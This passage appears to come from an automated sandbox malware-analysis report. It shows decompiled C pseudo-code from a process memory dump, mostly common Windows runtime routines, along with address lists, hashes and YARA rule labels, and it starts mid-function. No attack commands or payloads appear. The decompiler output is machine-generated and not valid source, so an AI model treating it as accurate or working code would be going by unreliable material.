							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x04fdef4b
0x04fdef4d
0x04fdef57
0x04fdf0bd
0x04fdf0c2
0x04fdf0d2
0x04fdf0d2
0x04fdf0c2
0x04fdef5d
0x04fdef5f
0x04fdef67
0x04fdef6a
0x04fdef6d
0x04fdef74
0x04fdef7f
0x04fdef82
0x04fdef82
0x04fdef86
0x04fdef88
0x04fdef8c
0x04fdef8f
0x04fdef8f
0x04fdef8f
0x00000000
0x04fdef91
0x04fdef93
0x04fdefc4
0x04fdefc4
0x04fdefc4
0x04fdefca
0x04fdefd0
0x04fdf0a6
0x00000000
0x00000000
0x04fdf0af
0x0502bb06
0x0502bb0a
0x04fdf0b5
0x04fdf0b5
0x04fdf0b5
0x04fdf0b5
0x00000000
0x04fdefd6
0x04fdefd9
0x04fdf0de
0x04fdf0e2
0x04fdefdf
0x04fdefdf
0x04fdefdf
0x04fdefe5
0x0502bafc
0x0502bafc
0x04fdefe5
0x04fdefeb
0x04fdefed
0x04fdf00f
0x04fdf011
0x04fdf01a
0x04fdf01d
0x04fdf021
0x04fdf028
0x04fdf029
0x04fdf029
0x04fdf02c
0x00000000
0x04fdf02c
0x04fdeff3
0x04fdeff9
0x04fdf0ea
0x04fdf0ed
0x04fdf0ef
0x00000000
0x04fdf0ef
0x04fdf003
0x0502bb12
0x04fdf045
0x04fdf049
0x04fdf051
0x04fdf09e
0x04fdf0a0
0x04fdf0a0
0x04fdf09e
0x04fdf053
0x04fdf064
0x04fdf064
0x04fdf06b
0x0502bb1a
0x0502bb1a
0x04fdf071
0x04fdf071
0x04fdf07d
0x04fdf082
0x04fdf08f
0x04fdf08f
0x04fdf009
0x04fdf00d
0x00000000
0x04fdf00d
0x04fdefd0
0x04fdef97
0x04fdefa5
0x04fdefaa
0x00000000
0x04fdefac
0x04fdefac
0x04fdefac
0x00000000
0x04fdefb2
0x04fdf036
0x04fdf03a
0x04fdf040
0x04fdf090
0x00000000
0x04fdf092
0x04fdf042
0x00000000
0x04fdf042
0x04fdefb7
0x04fdefb9
0x04fdefbc
0x04fdefb0
0x04fdefb0
0x00000000
0x04fdefbe
0x04fdefbe
0x04fdefc1
0x00000000
0x04fdefc1
0x04fdefbc
0x04fdefaa
0x04fdef91

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: c1b92f2198e1e31f98615c53b31ba26c10c2d70af89d38bc1220a81e3f68128e
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: E6510231E04645DFDB15CF68C0D4BAEBBB2AF05304F1C81A8C5469B281D376B98AD761

Uniqueness

Uniqueness Score: -1.00%

Function 0509740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0509740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0501D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0500F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04FE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04FE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0500F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04FE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0509740d
0x0509740d
0x05097412
0x05097413
0x05097416
0x05097418
0x0509741c
0x0509741f
0x05097422
0x05097422
0x05097428
0x0509742a
0x0509742a
0x05097451
0x05097432
0x0509744f
0x0509744f
0x00000000
0x05097434
0x05097438
0x05097443
0x05097517
0x05097517
0x0509751a
0x05097535
0x05097520
0x05097527
0x0509752c
0x05097531
0x05097533
0x00000000
0x05097533
0x00000000
0x05097531
0x0509754b
0x0509754f
0x0509755c
0x0509755c
0x0509755f
0x05097560
0x05097561
0x05097562
0x05097563
0x05097568
0x0509756a
0x0509756c
0x0509756d
0x0509756d
0x0509756f
0x05097572
0x05097574
0x05097577
0x0509757c
0x0509757f
0x00000000
0x05097551
0x05097551
0x05097551
0x05097553
0x05097553
0x05097449
0x05097449
0x0509744c
0x0509744c
0x00000000
0x0509744c
0x05097443
0x0509750e
0x05097514
0x05097514
0x05097455
0x05097469
0x0509746d
0x00000000
0x05097473
0x05097473
0x05097476
0x05097480
0x05097484
0x0509748e
0x05097493
0x05097493
0x05097496
0x05097499
0x050974a1
0x050974b1
0x050974b5
0x00000000
0x050974bb
0x050974c1
0x050974c1
0x050974c4
0x050974c5
0x050974c6
0x050974c7
0x050974c8
0x050974cd
0x00000000
0x050974d3
0x050974d3
0x050974d6
0x050974d8
0x050974db
0x050974dd
0x050974e0
0x050974e7
0x050974ee
0x050974ee
0x050974f4
0x050974f9
0x00000000
0x050974fb
0x050974fb
0x050974fd
0x05097500
0x05097503
0x05097505
0x05097505
0x050974f9
0x00000000
0x050974cd
0x050974b5
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 21bbf0c5e3b4b161e461c11589bbf4acdc9005d6bcd48178686a91c035029a5b
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 56518E72600606EFDF59CF14D880A9ABBF5FF45304F14C0AAE9089F256E3B1E946DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04FF2990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04FF2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x509ff00);
				E0501D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4fa1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0500E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4fa1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E050451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4fa166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04FF2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04FD6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04FF2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04FDEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04FF2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04FF2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04FF2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0501D0D1(_t62);
				goto L28;
			}

0x04ff2990
0x04ff2992
0x04ff2997
0x04ff29a3
0x04ff29a6
0x04ff29ab
0x04ff29ad
0x04ff29b2
0x05035c80
0x04ff29b8
0x04ff29b8
0x04ff29bb
0x04ff29c0
0x04ff29c5
0x04ff29c6
0x04ff29c6
0x04ff29cb
0x00000000
0x00000000
0x04ff29cd
0x04ff29d0
0x04ff29d9
0x04ff29db
0x04ff29dd
0x04ff2a7f
0x04ff2a84
0x04ff2a87
0x04ff2a89
0x05035ca1
0x05035ca3
0x00000000
0x04ff2a8f
0x04ff2a8f
0x00000000
0x04ff2a8f
0x00000000
0x04ff29e3
0x04ff29e3
0x04ff29e3
0x00000000
0x04ff29e3
0x04ff29dd
0x00000000
0x04ff29db
0x04ff29e6
0x04ff29e9
0x04ff29eb
0x04ff29ed
0x04ff29f3
0x04ff29f5
0x04ff29f8
0x04ff29fa
0x04ff2a97
0x04ff2a9a
0x04ff2a9d
0x04ff2add
0x00000000
0x04ff2a9f
0x04ff2aa2
0x04ff2aa5
0x04ff2aa8
0x04ff2aab
0x05035cab
0x05035caf
0x05035cc5
0x05035cda
0x05035cdc
0x05035cdf
0x05035ce5
0x00000000
0x05035ceb
0x05035ced
0x05035cee
0x00000000
0x05035cee
0x05035cb1
0x05035cb4
0x05035cb9
0x05035cbb
0x00000000
0x05035cbd
0x05035cbd
0x00000000
0x05035cbd
0x05035cbb
0x04ff2ab1
0x04ff2ab1
0x04ff2ac4
0x04ff2ac6
0x04ff2ac6
0x00000000
0x04ff2ac6
0x04ff2aab
0x00000000
0x04ff2a00
0x04ff2a09
0x04ff2a0e
0x04ff2a21
0x04ff2a24
0x04ff2a35
0x04ff2a3a
0x04ff2a3d
0x04ff2a42
0x04ff2a59
0x04ff2a59
0x04ff2a5c
0x04ff2a5f
0x04ff2a5f
0x04ff29fa
0x04ff29f3
0x04ff2a64
0x04ff2a64
0x04ff2a6b
0x04ff2a6b
0x04ff2a6d
0x04ff2a72
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d08f894ae8be87acb3644b5bee54bd904f60a1249e29ca18d86a39853c5513
Instruction ID: 243336ce4576eb177172ce1045c1746172c54725ac0630f0c03c1b06fb6ec345
Opcode Fuzzy Hash: 06d08f894ae8be87acb3644b5bee54bd904f60a1249e29ca18d86a39853c5513
Instruction Fuzzy Hash: 5E516A72A00209DFDF25DF55CC80ADEBBB5BF08714F068095EA15AB270D336A952DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04FF4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04FF4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x50bd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0500FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x50b7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0500B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04FE4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04FCCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0500B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0500F380(_t67 + 0xc, 0x4fa5138, 0x10) == 0) {
								 *0x50b60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04FF4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04FF4E70(0x50b86b0, 0x4ff5690, 0, 0) != 0) {
					_t46 = E04FCCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04ff4d3b
0x04ff4d4d
0x04ff4d53
0x04ff4d58
0x04ff4d65
0x04ff4d6c
0x04ff4d71
0x04ff4d77
0x04ff4d7f
0x04ff4d8c
0x04ff4d8e
0x04ff4dad
0x04ff4db0
0x04ff4db7
0x04ff4db8
0x04ff4db9
0x04ff4dba
0x04ff4dbb
0x04ff4dc1
0x04ff4dc8
0x04ff4dcc
0x04ff4dd5
0x04ff4dde
0x04ff4ddf
0x04ff4de0
0x04ff4de1
0x04ff4de6
0x04ff4de7
0x04ff4de9
0x04ff4df3
0x00000000
0x00000000
0x05036c7c
0x05036c8a
0x05036c8a
0x05036c9d
0x05036ca7
0x05036cac
0x05036cb2
0x05036cb9
0x00000000
0x05036cbf
0x05036cbf
0x00000000
0x05036cbf
0x05036cb9
0x04ff4dfb
0x05036ccf
0x05036cd3
0x04ff4e32
0x04ff4e39
0x05036ce0
0x05036cf2
0x05036cf2
0x05036ce0
0x04ff4e3f
0x04ff4e41
0x04ff4e51
0x04ff4e51
0x04ff4e03
0x04ff4e03
0x04ff4e09
0x04ff4e0f
0x04ff4e57
0x00000000
0x00000000
0x04ff4e1b
0x04ff4e30
0x04ff4e5b
0x04ff4e5b
0x00000000
0x04ff4e30
0x04ff4e11
0x04ff4e11
0x04ff4e16
0x00000000
0x04ff4e16
0x04ff4e01
0x00000000
0x04ff4e01
0x04ff4da5
0x05036c6b
0x00000000
0x04ff4dab
0x04ff4dab
0x00000000
0x04ff4dab

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef03874475c36ef24f74d7d2b95bfb08d195f7e0c7dbc337b03fd400cff0ff4d
Instruction ID: ade9574e18c82bb79dd36742397bb2560ea391ca9bde0a53e63fb856fd5c55a0
Opcode Fuzzy Hash: ef03874475c36ef24f74d7d2b95bfb08d195f7e0c7dbc337b03fd400cff0ff4d
Instruction Fuzzy Hash: CE41D171A40318AFEB21DF14DD81FBBB7A9EF54614F0000A9EA459B2A0DB74ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04FF4BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04FF4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x50bd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04FCCC50(_t86);
					L11:
					return E0500B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x50b8504
				E04FE2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0500FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0500B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04FE4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04FCCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x50b8504
								E04FDFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04FF4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x04ff4bad
0x04ff4bbf
0x04ff4bc2
0x04ff4bc6
0x04ff4bcd
0x04ff4bd9
0x050367fe
0x05036800
0x04ff4ccc
0x04ff4ccd
0x04ff4cb7
0x04ff4cc9
0x04ff4cc9
0x04ff4bdf
0x04ff4be5
0x00000000
0x00000000
0x04ff4beb
0x04ff4bef
0x00000000
0x00000000
0x04ff4bf5
0x04ff4bf9
0x04ff4c06
0x04ff4c0b
0x04ff4c17
0x04ff4c1c
0x04ff4c1f
0x04ff4c25
0x04ff4c33
0x04ff4c3d
0x04ff4c40
0x04ff4c43
0x04ff4c47
0x04ff4c4d
0x04ff4c53
0x04ff4c54
0x04ff4c55
0x04ff4c56
0x04ff4c5b
0x04ff4c5c
0x04ff4c63
0x04ff4c6b
0x00000000
0x00000000
0x05036776
0x05036784
0x05036784
0x0503679f
0x050367a7
0x050367af
0x050367ce
0x00000000
0x050367b1
0x050367b7
0x050367b8
0x050367c1
0x050367d3
0x050367d9
0x050367dd
0x04ff4c94
0x04ff4c94
0x04ff4c98
0x04ff4c9c
0x04ff4ca3
0x050367f4
0x050367f4
0x04ff4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x04ff4cb5
0x04ff4c79
0x04ff4c7e
0x04ff4c89
0x04ff4c8b
0x04ff4c8f
0x04ff4c8f
0x00000000
0x04ff4c89
0x050367c3
0x00000000
0x050367c3
0x050367af
0x04ff4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfc7afe168836fff700b87ed0af5df45b10a88fe8a2ec6526660c15fa30bbf71
Instruction ID: d81338027388e5fa6b5eb1cea234166de0ae093f02f27046d5ee1657f6679333
Opcode Fuzzy Hash: cfc7afe168836fff700b87ed0af5df45b10a88fe8a2ec6526660c15fa30bbf71
Instruction Fuzzy Hash: CE41A636A00228ABDB20DF64DD41FEE77B8FF45700F4101A5E909AB250E775EE85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04FD8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04FD8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x50bd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0500B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04FDE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
